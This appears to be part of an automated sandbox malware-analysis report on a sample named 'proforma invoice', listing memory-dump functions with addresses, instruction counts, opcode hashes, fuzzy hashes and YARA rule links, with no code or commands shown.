
Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9282d4c5f921b0d5865d12328469d296cdc72db981b6af35a054633262c7c4f0
Instruction ID: 1ee75bb5b78bf766d990c96d97f2bd7e65d252075ba590f520099187814e6fc2
Opcode Fuzzy Hash: 9282d4c5f921b0d5865d12328469d296cdc72db981b6af35a054633262c7c4f0
Instruction Fuzzy Hash: AA016DF17101175BEF64956D9884B2BBBEADBC9624F20843AE20EC7365DE65EC024391

Function 015B6728 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee845d80e80738a3cc5b8367cc9e4f223fed73460da29575815286ca70e2a57
Instruction ID: b637aad5edd087d2db33e2d8af8b818cfe28ba9368ae0265ea4afad11c134954
Opcode Fuzzy Hash: aee845d80e80738a3cc5b8367cc9e4f223fed73460da29575815286ca70e2a57
Instruction Fuzzy Hash: 6E11D7B5A013068FCB12CF69C5C0AEAFBF5FF48200B1446AAD9599B346D730E955CF91

Function 072371F9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0fbe733620c3fea5f362444d1d9852e198a3724a061ba0e100386f544e8f96f
Instruction ID: d7e651f7889a97af4ca8628de03563164a7f3a7511203ffd00ede0a8e0a8646a
Opcode Fuzzy Hash: d0fbe733620c3fea5f362444d1d9852e198a3724a061ba0e100386f544e8f96f
Instruction Fuzzy Hash: 6D018FB2B200169BDF58EAA8ED50BAF77EEDBC8214F014139E505E7344DEA5CC0287A5

Function 015B1840 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c8c474463c808d1457272df09196d03c80f0d03e9a4e423c9fbbe714e89db2b
Instruction ID: c28a73a8c8ce306bae997f9f3fbc4d003c7933b05bd29d26c0ebb8e4fefa3409
Opcode Fuzzy Hash: 6c8c474463c808d1457272df09196d03c80f0d03e9a4e423c9fbbe714e89db2b
Instruction Fuzzy Hash: D9015235300309AFEB259A65EC94F9AB7E6FFC4751F108529F60A8F194CAB1AC458790

Function 05E3D6E0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47f5cd146a1b57b02089ba586aa54838f1f971d26bd2724ca35c99b730a4673d
Instruction ID: 7a426d3b461ac57278521154f0ea12fc913fa7bc56beea86887b26dc44c97d93
Opcode Fuzzy Hash: 47f5cd146a1b57b02089ba586aa54838f1f971d26bd2724ca35c99b730a4673d
Instruction Fuzzy Hash: CA112231A00204CFDB00DF64DE98B9ABBA1FF84355F14C165C80CAF296EB70E916CBA1

Function 05E3D6F0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3145584871ef54d7cb40216e56871db35e87ad11bfca88bcef61b86b8ceddfaf
Instruction ID: 1da7d2c31571b0f1d691881bdf70764bca9685bbc2d36dfd692a6b0b72ea9680
Opcode Fuzzy Hash: 3145584871ef54d7cb40216e56871db35e87ad11bfca88bcef61b86b8ceddfaf
Instruction Fuzzy Hash: 4001B531A002058BDB04DF55DD9868ABBA5FFC4350F54C165D80C5F255EB70E916CBA1

Function 0723D968 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be32396c74eded48b9d81c16e9088df1c491954d673c6eec3ff0adb8d68ca52a
Instruction ID: 228269411e406b9b6e4a733a518721c19170011b31f95634fbf3af16e3e923c2
Opcode Fuzzy Hash: be32396c74eded48b9d81c16e9088df1c491954d673c6eec3ff0adb8d68ca52a
Instruction Fuzzy Hash: A1018CB07100164BDB649A7CE855B1AB7F6EB89614F10842AE54ECB360DE75ED028780

Function 015B1838 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 079a9842b8f19f422c356927368d36e641386b9c0ecb5583b8f23c8538975cff
Instruction ID: 99d35553d68907064408a668c28f5e68d415e53eaae59bac205ab11abeb9e9b7
Opcode Fuzzy Hash: 079a9842b8f19f422c356927368d36e641386b9c0ecb5583b8f23c8538975cff
Instruction Fuzzy Hash: EE01A7317007059FDB659B68EC94B9EB7E6FFD4350F048529F60A8F2A4CBB0AC458790

Function 05E3FE50 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b624e94c713172b6445cefd47462e83945350b8de5a50dfbb0379ea038bcf4cb
Instruction ID: 576ad85e3301d339759f28cbbfe183d057591014ebfd58346d540f3cf00f1dbc
Opcode Fuzzy Hash: b624e94c713172b6445cefd47462e83945350b8de5a50dfbb0379ea038bcf4cb
Instruction Fuzzy Hash: 4401C831B081019FD724CE39D449AAA7FE6FF49325F2044BAE159C7762EA35DC41C790

Function 05E39BE1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9215803f6c4b0d5c133d6d024f4433a3b2e3aaec8911e0dff91059419bbe38ab
Instruction ID: 5db1d07ef9f6915e6fa2bdd6745874b15829009c6228b2b09e584c1347dc746d
Opcode Fuzzy Hash: 9215803f6c4b0d5c133d6d024f4433a3b2e3aaec8911e0dff91059419bbe38ab
Instruction Fuzzy Hash: 0101AD71B001198FD708AFB8C05879E77AAFFC9744F21807AD01ADB790EE729816CB91

Function 015BD877 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967d8b5649728d0fd347347705fd25a042c2cf100d198488a0d3e85f9d138c75
Instruction ID: 09185d2a32d7be0413ca52c6a3658ad04dff81545333a54692d4b050585771be
Opcode Fuzzy Hash: 967d8b5649728d0fd347347705fd25a042c2cf100d198488a0d3e85f9d138c75
Instruction Fuzzy Hash: 3B011E35B0001A9FDF05DBA8D8956EDB7B2FBC8229F148029E409AB395CB359C41DB50

Function 05E361A1 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c1e8c590b812bdf85bc432afcfbd3a641f58e5b2395d1cc144bb1aeba93f2e
Instruction ID: 7331f1ac761b860ecf48cf2341ae5165e4f9064cca730e85dc62506e489a3f05
Opcode Fuzzy Hash: 67c1e8c590b812bdf85bc432afcfbd3a641f58e5b2395d1cc144bb1aeba93f2e
Instruction Fuzzy Hash: 90F0A435204305AFEB14CB36D849DA777A6BFC4225B05A56DE89E8B126DB70E801CB51

Function 015BE848 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018fa57854214e189e5c02fe435eea0e288a7e59d3206330f380d17e2fe0353c
Instruction ID: 22e6fcef0dd6fe6c6a3bd44cffbb355a0f820896960f0bb5522ab7ba3ebb5dad
Opcode Fuzzy Hash: 018fa57854214e189e5c02fe435eea0e288a7e59d3206330f380d17e2fe0353c
Instruction Fuzzy Hash: A8F046325097908FD326DB34DC613457BB68F82610F08C5AFD09BC76E2CB64AC82C784

Function 05E3FE60 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78619b39a1d85b4374681d7e5a2f2e6f02cc4568ddeaf7c6e0dd5cdb1d15695
Instruction ID: f980e59f1f515e9b6162ca690cca245617ec6d9174f3e778bc9aaaf1c1d882f7
Opcode Fuzzy Hash: c78619b39a1d85b4374681d7e5a2f2e6f02cc4568ddeaf7c6e0dd5cdb1d15695
Instruction Fuzzy Hash: E2F09631B081049FDB54CE3AD449E6A77EBFF88624B1094BAE159C7361EA35DC41C750

Function 015BAF70 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04dbbfed27689f74dd8a269f7d7ca9b1ac8dd32e977e468fb91cc32f0b722409
Instruction ID: 90374401aaae57bc7b5b0a8d3e7164941641f8ebdfd36dfe02d5395129fa8ad9
Opcode Fuzzy Hash: 04dbbfed27689f74dd8a269f7d7ca9b1ac8dd32e977e468fb91cc32f0b722409
Instruction Fuzzy Hash: ABF09071600B066B93249E1F949455AFBE9FFD4211704893EE00A8A221EEB0D9098691

Function 05E3BF41 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8082e1c872a0852e3d86a9c6027dbcec28f59118b2b9ca3047d17ce7da52ad4
Instruction ID: e895967026bb6c8d0e6ef6210c99e014fbae1d765eac753c53ff31811906df95
Opcode Fuzzy Hash: b8082e1c872a0852e3d86a9c6027dbcec28f59118b2b9ca3047d17ce7da52ad4
Instruction Fuzzy Hash: A601627060020ADFCB45DB68F985A8D77B1EF85314F804659D5049B2A1DE36AE15CBC5

Function 015BC408 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1d12cf89c16509318c8b490de05bad299cf827c02d0c6aed18c6d6e10d7ff0
Instruction ID: ea97b284edb6159b04bec606c6e193b6a4fb4dca093fa7aacd717b15ef25ffe1
Opcode Fuzzy Hash: 0d1d12cf89c16509318c8b490de05bad299cf827c02d0c6aed18c6d6e10d7ff0
Instruction Fuzzy Hash: D3F0B4603087444BD31A637594107ABBADBFFC1250F19856EC14A8F796CFA9DC0987D6

Function 015BAB94 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8eb5d7821d2d5a21cb810354a86061fc802c52f04aa49563995796b02426b3e
Instruction ID: d2030ce8672535553012d61d8f8c2a557a054cf9b658c1c738d4864afadac7d3
Opcode Fuzzy Hash: c8eb5d7821d2d5a21cb810354a86061fc802c52f04aa49563995796b02426b3e
Instruction Fuzzy Hash: 4DF02472A08255CFCB128FA888D01ECBBB2FA9925071844EAD851DF251E230C842C761

Function 05E3AEE8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5dd5df96ba8c27fdf4af2beef45ab908cf95dfa0c6f916743df354e6453f19
Instruction ID: 1e9066751d63eaaa51569804c68b69e7f3d3f0f1e2ff876b486d992ee18f5f63
Opcode Fuzzy Hash: 7b5dd5df96ba8c27fdf4af2beef45ab908cf95dfa0c6f916743df354e6453f19
Instruction Fuzzy Hash: 26F01439B10114CFC714DB65E5A9A6C77B2FF88225F1440A8E506CB3A0DF35AC42CB40

Function 015B8829 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5892370230d52607f05aa92a4115a0557442e93d1fdc18be393b2640a26a45
Instruction ID: bd9e9cc825c011762adb68980d235a65dc2eef213afa4912329b7a78d4dc8b66
Opcode Fuzzy Hash: 0a5892370230d52607f05aa92a4115a0557442e93d1fdc18be393b2640a26a45
Instruction Fuzzy Hash: 97E0D837703A3503D620102AFA6635AB66DF3C2A10F1CD835BE08DB700E931D80196D4

Function 05E3BF50 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed79806f4ecef9b027af09a7424481409016b8d6d7b5154dead8d88f48e7fc89
Instruction ID: a2fa30b87ba735cf834d192970fe3717946dc838c861e9735ea08e7811c05637
Opcode Fuzzy Hash: ed79806f4ecef9b027af09a7424481409016b8d6d7b5154dead8d88f48e7fc89
Instruction Fuzzy Hash: DBF04470A00209DFCB41EFB8F955A9D77B5EF84204F904669C8049B360EE359F188BC1

Function 015BA273 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ec334206aa8308cd1bf16b79b6606c69b8020b59f120ca9d1148229e24a431
Instruction ID: 4f9a27b3d8a3d5b510c08f200914f0ead0d772f69d44c313fbe1d0c7e62137dc
Opcode Fuzzy Hash: 90ec334206aa8308cd1bf16b79b6606c69b8020b59f120ca9d1148229e24a431
Instruction Fuzzy Hash: 2B011EB09043408BEF15CF29E4847D87BA1AF88315F1882B9CD5D4E19BD7744504CF21

Function 015B437D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ce8bdde83f3fddb93effb82a0220a27a72c9e362890e499b1f7271b3ce42f2
Instruction ID: 38c8875046122597774e99a553f8054382b8fd07d6efc2967f01e4970f3f9ef7
Opcode Fuzzy Hash: 47ce8bdde83f3fddb93effb82a0220a27a72c9e362890e499b1f7271b3ce42f2
Instruction Fuzzy Hash: 75F06D35B04B45CBEB31CF25E4807EAB3E1FB44305F044829D0ABCA902C774E4918B01

Function 0723B946 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676808d8ccee9a950941dcd76d0db64027a8dc50573ae26d28055e5157fc8888
Instruction ID: c9d20df67fdca34e667565a331b0defb615ffef69cb6f218732b6d0be2a80b09
Opcode Fuzzy Hash: 676808d8ccee9a950941dcd76d0db64027a8dc50573ae26d28055e5157fc8888
Instruction Fuzzy Hash: 1FF039F6B38213DBDF244D55E9842A97374DB8A262F1441A2CD01C7240D67ADB85CE61

Function 015B4388 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bbfe14439dce41b3012eba2e2f7f6139c261868344a2bb5bbacbeb682d6e8e
Instruction ID: 150e60e4ea1f2ec519daa1e11ba7fea1b93bd7468fdb18af76d8d30a268d59f4
Opcode Fuzzy Hash: 87bbfe14439dce41b3012eba2e2f7f6139c261868344a2bb5bbacbeb682d6e8e
Instruction Fuzzy Hash: 22F0B26160EBD55FEB1386249CA52D5BFB09F43104F1D04EBC9C9CE493D92E841AD363

Function 015BC418 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c21aa0c2613318bc23772f5b446ae36e31e45b31862988f808289389c51d4e
Instruction ID: f83b364a0a5ff49effc6f2396bbd60a4aebee5f457ab322c66b37518ecee61f9
Opcode Fuzzy Hash: f4c21aa0c2613318bc23772f5b446ae36e31e45b31862988f808289389c51d4e
Instruction Fuzzy Hash: 5EE06D713047044BD71966AA94247AFB2DBFFC0250B18882EC10A8F7A8DFE6DC0647E6

Function 015B2918 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d795acd93c953cd9b97030f44e05cf63b548d933b38b0fe9885c3a0360274c
Instruction ID: 2b288fc954f18bcdc66ae5f269218e50257694ca5f1fc84e306b4ca28c0f38c1
Opcode Fuzzy Hash: 25d795acd93c953cd9b97030f44e05cf63b548d933b38b0fe9885c3a0360274c
Instruction Fuzzy Hash: 6BE0C976B0C6115B975DDA1D9C5056ABAD3ABC8210B19C83CE48DC7344EA319C468759

Function 015B66D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b174008b96e77d6d4e47ce63fc7bf6616d02311c8b7be3bb750a07f3c29c48
Instruction ID: 46fe14043b19b64025cdeaa5425aff4e1131c1e75f372c33954f35fe8cf9a2f9
Opcode Fuzzy Hash: c7b174008b96e77d6d4e47ce63fc7bf6616d02311c8b7be3bb750a07f3c29c48
Instruction Fuzzy Hash: 49F030356142165FE7249AACE0047DABBD9EB44320F10406AE95EC3B85EB7568408790

Function 015BE120 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab29c352712d94a016d1837a41517fad48391a68f4bf94e7f83634f5a4af8b8a
Instruction ID: 5b1d8ee7f5d8e71528fead8aa570d8fd64a737df67def033ace673d3cb7aef83
Opcode Fuzzy Hash: ab29c352712d94a016d1837a41517fad48391a68f4bf94e7f83634f5a4af8b8a
Instruction Fuzzy Hash: D3E0D832700A5257D7256A38F4657EBBB95FBC16117088139E41ECB700CF25D806D7C4

Function 015B18D0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a94be85e036fa8c81c9c13b194872d55348db5ddbe076fa34f1bebf3b2e441e
Instruction ID: 02b671642ce6c7bcacea47fe9d948f74cf6848524a024862a3df8e833284897a
Opcode Fuzzy Hash: 4a94be85e036fa8c81c9c13b194872d55348db5ddbe076fa34f1bebf3b2e441e
Instruction Fuzzy Hash: 33E0EDB39087848FE3528724E8E05D2BBE0FF912057044996E08ACE422D678A50AD702

Function 015BE8B0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3668323176ee01f063321d0649e8b7b9e159f5d50435a8130459d11863fa85b6
Instruction ID: 1cf392dd16467de23abb0e9dd139ed1e5b560a28012d062c21d4cddaeab1f2ba
Opcode Fuzzy Hash: 3668323176ee01f063321d0649e8b7b9e159f5d50435a8130459d11863fa85b6
Instruction Fuzzy Hash: D6F08274D042499FC750DF6CC481599BFF0EB09224B1442D9D858DB346E631A602CFD0

Function 07239ACA Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e3b99d02d4bb29d32e49e60e9d6dc192c1d684a2f566e08199bbd752ce52a1
Instruction ID: 4256fe1868135afa1c7653f3addd7b7763cc627355911dd517b573fc59503eae
Opcode Fuzzy Hash: c1e3b99d02d4bb29d32e49e60e9d6dc192c1d684a2f566e08199bbd752ce52a1
Instruction Fuzzy Hash: BAE048F1E1414657DF10CB74CA8975A77A4DB43208F2445A5D4A9DB141E2B6D942C740

Function 015BA311 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbfb1d4ad59a221360dd9ac8984a76f87c3c038b9a78b5a1ef375d5d654b1133
Instruction ID: 928b27f92f3357c549248d02805f0e2f96ef9a800bf3500ea7e7d1c87a804032
Opcode Fuzzy Hash: cbfb1d4ad59a221360dd9ac8984a76f87c3c038b9a78b5a1ef375d5d654b1133
Instruction Fuzzy Hash: 40E01A317921008FDBA8CF28D084A6D77F4BF4962432880A8E10DCF632CB32DC02CB00

Function 05E37A9A Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bec7b92a1ed7d8d3fe9bb9c752fad85e188dd5632a597734f135e65094c97ad
Instruction ID: 48dad940c320b972d5d372c7c5ea42e74530cebaf8d4c5af694392f70a3652c9
Opcode Fuzzy Hash: 8bec7b92a1ed7d8d3fe9bb9c752fad85e188dd5632a597734f135e65094c97ad
Instruction Fuzzy Hash: EBE0D8767005108BC3208F58E54AB6A37A2DB882517068269EC4E837C1CE389D01C784

Function 07239AD8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6976a18e4f5445d22ac6d243165c3e487cb47688e2b37c0be1cdf677f81c9a3
Instruction ID: 096942b894a5728086ae7b7ccc53c4cc549a771cb19ec84ba987a9db000f6797
Opcode Fuzzy Hash: a6976a18e4f5445d22ac6d243165c3e487cb47688e2b37c0be1cdf677f81c9a3
Instruction Fuzzy Hash: E3E012F2E1424AABDF10DAB4CD8975A77ADD702218F2095A5D499CB201E6F6EA41C780

Function 015BE130 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1887db1975a1231e09aade94a7833ea41d54b4e4c644c59aafa03208e7b6bde
Instruction ID: b389eb551409dce0161ad9a3555bb53481beecf90d44911fc568657d5c1f1cba
Opcode Fuzzy Hash: d1887db1975a1231e09aade94a7833ea41d54b4e4c644c59aafa03208e7b6bde
Instruction Fuzzy Hash: F8E08C32300616178A242A69E8656DABB99FAC5612304413AE91D8B200DE65A80187D8

Function 015BDFE2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a27abe86023df8198e58b5d6a56216dc0b08574fc9dc2d12c6f3f5c8ca5538
Instruction ID: abb00b2fdebd09d2109a7d8a85deefeaaa07d32ad349740f47d8aad934031b6e
Opcode Fuzzy Hash: f4a27abe86023df8198e58b5d6a56216dc0b08574fc9dc2d12c6f3f5c8ca5538
Instruction Fuzzy Hash: 6FE09274600648ABC701DBA4E912A4DFBB5FB89201F44C6A9D80893740DA35AF10DB80

Function 05E37AA8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
